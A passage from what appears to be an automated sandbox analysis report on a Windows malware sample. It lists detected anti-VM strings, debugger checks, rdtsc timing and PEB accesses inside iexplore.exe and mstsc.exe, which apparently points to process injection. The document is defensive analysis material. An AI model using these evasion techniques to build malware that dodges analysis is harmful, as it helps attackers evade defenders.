          Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: iexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
          Source: explorer.exe, 00000005.00000002.4157091607.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0040ACE0 LdrLoadDll,1_2_0040ACE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0038F581 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,6_2_0038F581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0040B05F LoadLibraryW,GetProcAddress,memset,FreeLibrary,6_2_0040B05F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037612ED mov eax, dword ptr fs:[00000030h]1_2_037612ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037612ED mov eax, dword ptr fs:[00000030h]1_2_037612ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037612ED mov eax, dword ptr fs:[00000030h]1_2_037612ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037612ED mov eax, dword ptr fs:[00000030h]1_2_037612ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037612ED mov eax, dword ptr fs:[00000030h]1_2_037612ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037612ED mov eax, dword ptr fs:[00000030h]1_2_037612ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037612ED mov eax, dword ptr fs:[00000030h]1_2_037612ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037612ED mov eax, dword ptr fs:[00000030h]1_2_037612ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BA2C3 mov eax, dword ptr fs:[00000030h]1_2_036BA2C3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BA2C3 mov eax, dword ptr fs:[00000030h]1_2_036BA2C3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BA2C3 mov eax, dword ptr fs:[00000030h]1_2_036BA2C3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BA2C3 mov eax, dword ptr fs:[00000030h]1_2_036BA2C3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BA2C3 mov eax, dword ptr fs:[00000030h]1_2_036BA2C3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DB2C0 mov eax, dword ptr fs:[00000030h]1_2_036DB2C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DB2C0 mov eax, dword ptr fs:[00000030h]1_2_036DB2C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DB2C0 mov eax, dword ptr fs:[00000030h]1_2_036DB2C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DB2C0 mov eax, dword ptr fs:[00000030h]1_2_036DB2C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DB2C0 mov eax, dword ptr fs:[00000030h]1_2_036DB2C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DB2C0 mov eax, dword ptr fs:[00000030h]1_2_036DB2C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DB2C0 mov eax, dword ptr fs:[00000030h]1_2_036DB2C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B92C5 mov eax, dword ptr fs:[00000030h]1_2_036B92C5
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B92C5 mov eax, dword ptr fs:[00000030h]1_2_036B92C5
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AB2D3 mov eax, dword ptr fs:[00000030h]1_2_036AB2D3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AB2D3 mov eax, dword ptr fs:[00000030h]1_2_036AB2D3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AB2D3 mov eax, dword ptr fs:[00000030h]1_2_036AB2D3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DF2D0 mov eax, dword ptr fs:[00000030h]1_2_036DF2D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DF2D0 mov eax, dword ptr fs:[00000030h]1_2_036DF2D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C02A0 mov eax, dword ptr fs:[00000030h]1_2_036C02A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C02A0 mov eax, dword ptr fs:[00000030h]1_2_036C02A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C52A0 mov eax, dword ptr fs:[00000030h]1_2_036C52A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C52A0 mov eax, dword ptr fs:[00000030h]1_2_036C52A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C52A0 mov eax, dword ptr fs:[00000030h]1_2_036C52A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C52A0 mov eax, dword ptr fs:[00000030h]1_2_036C52A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037392BC mov eax, dword ptr fs:[00000030h]1_2_037392BC
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037392BC mov eax, dword ptr fs:[00000030h]1_2_037392BC
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037392BC mov ecx, dword ptr fs:[00000030h]1_2_037392BC
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037392BC mov ecx, dword ptr fs:[00000030h]1_2_037392BC
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037792A6 mov eax, dword ptr fs:[00000030h]1_2_037792A6
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037792A6 mov eax, dword ptr fs:[00000030h]1_2_037792A6
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037792A6 mov eax, dword ptr fs:[00000030h]1_2_037792A6
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037792A6 mov eax, dword ptr fs:[00000030h]1_2_037792A6
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037462A0 mov eax, dword ptr fs:[00000030h]1_2_037462A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037462A0 mov ecx, dword ptr fs:[00000030h]1_2_037462A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037462A0 mov eax, dword ptr fs:[00000030h]1_2_037462A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037462A0 mov eax, dword ptr fs:[00000030h]1_2_037462A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037462A0 mov eax, dword ptr fs:[00000030h]1_2_037462A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037462A0 mov eax, dword ptr fs:[00000030h]1_2_037462A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037472A0 mov eax, dword ptr fs:[00000030h]1_2_037472A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037472A0 mov eax, dword ptr fs:[00000030h]1_2_037472A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EE284 mov eax, dword ptr fs:[00000030h]1_2_036EE284
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EE284 mov eax, dword ptr fs:[00000030h]1_2_036EE284
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03730283 mov eax, dword ptr fs:[00000030h]1_2_03730283
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03730283 mov eax, dword ptr fs:[00000030h]1_2_03730283
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03730283 mov eax, dword ptr fs:[00000030h]1_2_03730283
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E329E mov eax, dword ptr fs:[00000030h]1_2_036E329E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E329E mov eax, dword ptr fs:[00000030h]1_2_036E329E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03785283 mov eax, dword ptr fs:[00000030h]1_2_03785283
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03749179 mov eax, dword ptr fs:[00000030h]1_2_03749179
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF172 mov eax, dword ptr fs:[00000030h]1_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036A9148 mov eax, dword ptr fs:[00000030h]1_2_036A9148
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036A9148 mov eax, dword ptr fs:[00000030h]1_2_036A9148
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036A9148 mov eax, dword ptr fs:[00000030h]1_2_036A9148
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036A9148 mov eax, dword ptr fs:[00000030h]1_2_036A9148
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03785152 mov eax, dword ptr fs:[00000030h]1_2_03785152
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03748158 mov eax, dword ptr fs:[00000030h]1_2_03748158
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03744144 mov eax, dword ptr fs:[00000030h]1_2_03744144
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03744144 mov eax, dword ptr fs:[00000030h]1_2_03744144
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03744144 mov ecx, dword ptr fs:[00000030h]1_2_03744144
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03744144 mov eax, dword ptr fs:[00000030h]1_2_03744144
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03744144 mov eax, dword ptr fs:[00000030h]1_2_03744144
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03743140 mov eax, dword ptr fs:[00000030h]1_2_03743140
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03743140 mov eax, dword ptr fs:[00000030h]1_2_03743140
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03743140 mov eax, dword ptr fs:[00000030h]1_2_03743140
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B7152 mov eax, dword ptr fs:[00000030h]1_2_036B7152
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AC156 mov eax, dword ptr fs:[00000030h]1_2_036AC156
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B6154 mov eax, dword ptr fs:[00000030h]1_2_036B6154
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B6154 mov eax, dword ptr fs:[00000030h]1_2_036B6154
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E0124 mov eax, dword ptr fs:[00000030h]1_2_036E0124
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B1131 mov eax, dword ptr fs:[00000030h]1_2_036B1131
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B1131 mov eax, dword ptr fs:[00000030h]1_2_036B1131
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AB136 mov eax, dword ptr fs:[00000030h]1_2_036AB136
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AB136 mov eax, dword ptr fs:[00000030h]1_2_036AB136
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AB136 mov eax, dword ptr fs:[00000030h]1_2_036AB136
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AB136 mov eax, dword ptr fs:[00000030h]1_2_036AB136
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03770115 mov eax, dword ptr fs:[00000030h]1_2_03770115
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0375A118 mov ecx, dword ptr fs:[00000030h]1_2_0375A118
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0375A118 mov eax, dword ptr fs:[00000030h]1_2_0375A118
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0375A118 mov eax, dword ptr fs:[00000030h]1_2_0375A118
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0375A118 mov eax, dword ptr fs:[00000030h]1_2_0375A118
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B51ED mov eax, dword ptr fs:[00000030h]1_2_036B51ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037571F9 mov esi, dword ptr fs:[00000030h]1_2_037571F9
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E01F8 mov eax, dword ptr fs:[00000030h]1_2_036E01F8
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037861E5 mov eax, dword ptr fs:[00000030h]1_2_037861E5
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E1D0 mov eax, dword ptr fs:[00000030h]1_2_0372E1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E1D0 mov eax, dword ptr fs:[00000030h]1_2_0372E1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E1D0 mov ecx, dword ptr fs:[00000030h]1_2_0372E1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E1D0 mov eax, dword ptr fs:[00000030h]1_2_0372E1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E1D0 mov eax, dword ptr fs:[00000030h]1_2_0372E1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037851CB mov eax, dword ptr fs:[00000030h]1_2_037851CB
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037761C3 mov eax, dword ptr fs:[00000030h]1_2_037761C3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037761C3 mov eax, dword ptr fs:[00000030h]1_2_037761C3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036ED1D0 mov eax, dword ptr fs:[00000030h]1_2_036ED1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036ED1D0 mov ecx, dword ptr fs:[00000030h]1_2_036ED1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037611A4 mov eax, dword ptr fs:[00000030h]1_2_037611A4
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037611A4 mov eax, dword ptr fs:[00000030h]1_2_037611A4
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037611A4 mov eax, dword ptr fs:[00000030h]1_2_037611A4
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037611A4 mov eax, dword ptr fs:[00000030h]1_2_037611A4
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CB1B0 mov eax, dword ptr fs:[00000030h]1_2_036CB1B0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03707190 mov eax, dword ptr fs:[00000030h]1_2_03707190
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F0185 mov eax, dword ptr fs:[00000030h]1_2_036F0185
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373019F mov eax, dword ptr fs:[00000030h]1_2_0373019F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373019F mov eax, dword ptr fs:[00000030h]1_2_0373019F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373019F mov eax, dword ptr fs:[00000030h]1_2_0373019F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373019F mov eax, dword ptr fs:[00000030h]1_2_0373019F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AA197 mov eax, dword ptr fs:[00000030h]1_2_036AA197
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AA197 mov eax, dword ptr fs:[00000030h]1_2_036AA197
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AA197 mov eax, dword ptr fs:[00000030h]1_2_036AA197
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0376C188 mov eax, dword ptr fs:[00000030h]1_2_0376C188
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0376C188 mov eax, dword ptr fs:[00000030h]1_2_0376C188
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372D070 mov ecx, dword ptr fs:[00000030h]1_2_0372D070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03785060 mov eax, dword ptr fs:[00000030h]1_2_03785060
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov ecx, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373106E mov eax, dword ptr fs:[00000030h]1_2_0373106E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DC073 mov eax, dword ptr fs:[00000030h]1_2_036DC073
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03736050 mov eax, dword ptr fs:[00000030h]1_2_03736050
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0375705E mov ebx, dword ptr fs:[00000030h]1_2_0375705E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0375705E mov eax, dword ptr fs:[00000030h]1_2_0375705E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B2050 mov eax, dword ptr fs:[00000030h]1_2_036B2050
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DB052 mov eax, dword ptr fs:[00000030h]1_2_036DB052
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03746030 mov eax, dword ptr fs:[00000030h]1_2_03746030
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377903E mov eax, dword ptr fs:[00000030h]1_2_0377903E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377903E mov eax, dword ptr fs:[00000030h]1_2_0377903E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377903E mov eax, dword ptr fs:[00000030h]1_2_0377903E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377903E mov eax, dword ptr fs:[00000030h]1_2_0377903E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AA020 mov eax, dword ptr fs:[00000030h]1_2_036AA020
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AC020 mov eax, dword ptr fs:[00000030h]1_2_036AC020
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03734000 mov ecx, dword ptr fs:[00000030h]1_2_03734000
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CE016 mov eax, dword ptr fs:[00000030h]1_2_036CE016
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CE016 mov eax, dword ptr fs:[00000030h]1_2_036CE016
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CE016 mov eax, dword ptr fs:[00000030h]1_2_036CE016
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CE016 mov eax, dword ptr fs:[00000030h]1_2_036CE016
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B80E9 mov eax, dword ptr fs:[00000030h]1_2_036B80E9
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D50E4 mov eax, dword ptr fs:[00000030h]1_2_036D50E4
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D50E4 mov ecx, dword ptr fs:[00000030h]1_2_036D50E4
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AA0E3 mov ecx, dword ptr fs:[00000030h]1_2_036AA0E3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037360E0 mov eax, dword ptr fs:[00000030h]1_2_037360E0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AC0F0 mov eax, dword ptr fs:[00000030h]1_2_036AC0F0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F20F0 mov ecx, dword ptr fs:[00000030h]1_2_036F20F0
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_00390B1F GetLastError,SetLastError,GetProcessHeap,HeapFree
